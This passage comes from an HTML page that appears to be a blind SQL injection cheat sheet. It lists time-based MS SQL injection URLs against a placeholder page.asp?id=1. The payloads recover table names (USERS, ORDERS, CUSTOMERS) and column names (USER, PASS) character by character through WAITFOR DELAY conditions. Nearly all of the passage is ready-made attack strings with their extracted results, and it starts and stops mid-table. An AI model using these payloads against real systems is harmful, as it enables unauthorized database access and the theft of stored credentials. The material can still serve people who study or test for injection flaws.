<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> NAME </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> sysobjects </span><span style="color:#fdb910;">where</span><span style="color:#ff3300;"> xtype=char(85)</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">2</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=<strong>115</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> NAME </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> sysobjects </span><span style="color:#fdb910;">where</span><span style="color:#ff3300;"> xtype=char(85)</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">3</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=<strong>101</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> NAME </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> sysobjects </span><span style="color:#fdb910;">where</span><span style="color:#ff3300;"> xtype=char(85)</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">4</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=<strong>114</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> NAME </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> sysobjects </span><span style="color:#fdb910;">where</span><span style="color:#ff3300;"> xtype=char(85)</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">5</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=<strong>115</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds)</span><strong></strong><strong><span style="font-family:Tahoma;font-size:xx-small;">Table Name = USERS</span></strong></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; EXTRACT 2nd DATABASE TABLE</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (LEN(SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where xtype=char(85) and</span><span style="color:#ff3300;"> name</span><span style="color:#fdb910;">&gt;&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216;)</span><span style="color:#ff3300;">=6</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and</span><span style="color:#ff3300;"> name</span><span style="color:#fdb910;">&gt;&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">1</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=111</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;  </span>(+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and</span><span style="color:#ff3300;"> name</span><span style="color:#fdb910;">&gt;&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">2</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=114</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and</span><span style="color:#ff3300;"> name</span><span style="color:#fdb910;">&gt;&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">3</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=100</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and</span><span style="color:#ff3300;"> name</span><span style="color:#fdb910;">&gt;&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">4</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=101</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and</span><span style="color:#ff3300;"> name</span><span style="color:#fdb910;">&gt;&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">5</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=114</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and</span><span style="color:#ff3300;"> name</span><span style="color:#fdb910;">&gt;&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">6</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=115</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;">Table Name = ORDERS</span></strong></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; EXTRACT 3rd DATABASE TABLE</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (LEN(SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where xtype=char(85) and name&gt;&#8217;</span><span style="color:#a8a8a8;">ORDERS</span><span style="color:#fdb910;">&#8216;)</span><span style="color:#ff3300;">=9</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and name&gt;&#8217;</span><span style="color:#a8a8a8;">ORDERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">1</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=99</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and name&gt;&#8217;</span><span style="color:#a8a8a8;">ORDERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">2</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=117</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and name&gt;&#8217;</span><span style="color:#a8a8a8;">ORDERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">3</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=115</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and name&gt;&#8217;</span><span style="color:#a8a8a8;">ORDERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">4</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=116</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and name&gt;&#8217;</span><span style="color:#a8a8a8;">ORDERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">5</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=111</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and name&gt;&#8217;</span><span style="color:#a8a8a8;">ORDERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">6</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=109</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and name&gt;&#8217;</span><span style="color:#a8a8a8;">ORDERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">7</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=101</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and name&gt;&#8217;</span><span style="color:#a8a8a8;">ORDERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">8</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=114</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">NAME from sysobjects where </span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">xtype=char(85) and name&gt;&#8217;</span><span style="color:#a8a8a8;">ORDERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">9</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=115</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;">Table Name = CUSTOMERS</span></strong></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; EXTRACT 1st TABLE COLUMN NAME</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">LEN</span><span style="color:#fdb910;">(SELECT TOP 1 </span><span style="color:#ff3300;">column_name</span><span style="color:#fdb910;"> from </span><span style="color:#a8a8a8;">PRO-DB-1</span><span style="color:#ff3300;">.information_schema.columns</span><span style="color:#fdb910;"> where </span><span style="color:#ff3300;">table_name</span><span style="color:#fdb910;">=&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216;)</span><span style="color:#ff3300;">=4</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">SELECT TOP 1 </span><span style="color:#ff3300;">column_name</span><span style="color:#fdb910;"> from </span><span style="color:#a8a8a8;">PRO-DB-1</span><span style="color:#ff3300;">.information_schema.columns</span><span style="color:#fdb910;"> where </span><span style="color:#ff3300;">table_name</span><span style="color:#fdb910;">=&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">1</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=117</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">SELECT TOP 1 </span><span style="color:#ff3300;">column_name</span><span style="color:#fdb910;"> from </span><span style="color:#a8a8a8;">PRO-DB-1</span><span style="color:#ff3300;">.information_schema.columns</span><span style="color:#fdb910;"> where </span><span style="color:#ff3300;">table_name</span><span style="color:#fdb910;">=&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">2</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=115</span><span style="color:#fdb910;">) WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">SELECT TOP 1 </span><span style="color:#ff3300;">column_name</span><span style="color:#fdb910;"> from </span><span style="color:#a8a8a8;">PRO-DB-1</span><span style="color:#ff3300;">.information_schema.columns</span><span style="color:#fdb910;"> where </span><span style="color:#ff3300;">table_name</span><span style="color:#fdb910;">=&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">3</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=101</span><span style="color:#fdb910;">) WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">SELECT TOP 1 </span><span style="color:#ff3300;">column_name</span><span style="color:#fdb910;"> from </span><span style="color:#a8a8a8;">PRO-DB-1</span><span style="color:#ff3300;">.information_schema.columns</span><span style="color:#fdb910;"> where </span><span style="color:#ff3300;">table_name</span><span style="color:#fdb910;">=&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">4</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=114</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;  </span>(+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;">Column Name = USER</span></strong></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; EXTRACT 2nd TABLE COLUMN NAME</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (LEN(SELECT TOP 1 column_name from </span><span style="color:#a8a8a8;">PRO-DB-1</span><span style="color:#fdb910;">.information_schema.columns where table_name=&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216; and </span><span style="color:#ff3300;">column_name</span><span style="color:#fdb910;">&gt;</span><span style="color:#fdb910;">&#8216;</span><span style="color:#a8a8a8;">USER</span><span style="color:#fdb910;">&#8216;)</span><span style="color:#ff3300;">=4</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">SELECT TOP 1 column_name from </span><span style="color:#a8a8a8;">PRO-DB-1</span><span style="color:#fdb910;">.information_schema.columns where table_name=&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216; and </span><span style="color:#ff3300;">column_name</span><span style="color:#fdb910;">&gt;</span><span style="color:#fdb910;">&#8216;</span><span style="color:#a8a8a8;">USER</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">1</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=112</span><span style="color:#fdb910;">) WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">SELECT TOP 1 column_name from </span><span style="color:#a8a8a8;">PRO-DB-1</span><span style="color:#fdb910;">.information_schema.columns where table_name=&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216; and </span><span style="color:#ff3300;">column_name</span><span style="color:#fdb910;">&gt;</span><span style="color:#fdb910;">&#8216;</span><span style="color:#a8a8a8;">USER</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">2</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=97</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">SELECT TOP 1 column_name from </span><span style="color:#a8a8a8;">PRO-DB-1</span><span style="color:#fdb910;">.information_schema.columns where table_name=&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216; and </span><span style="color:#ff3300;">column_name</span><span style="color:#fdb910;">&gt;</span><span style="color:#fdb910;">&#8216;</span><span style="color:#a8a8a8;">USER</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">3</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=115</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">SELECT TOP 1 column_name from </span><span style="color:#a8a8a8;">PRO-DB-1</span><span style="color:#fdb910;">.information_schema.columns where table_name=&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216; and </span><span style="color:#ff3300;">column_name</span><span style="color:#fdb910;">&gt;&#8217;</span><span style="color:#a8a8a8;">USER</span><span style="color:#fdb910;">&#8216;</span></span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">4</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=115</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;">Column Name = PASS</span></strong></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; EXTRACT 3rd TABLE COLUMN NAME</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
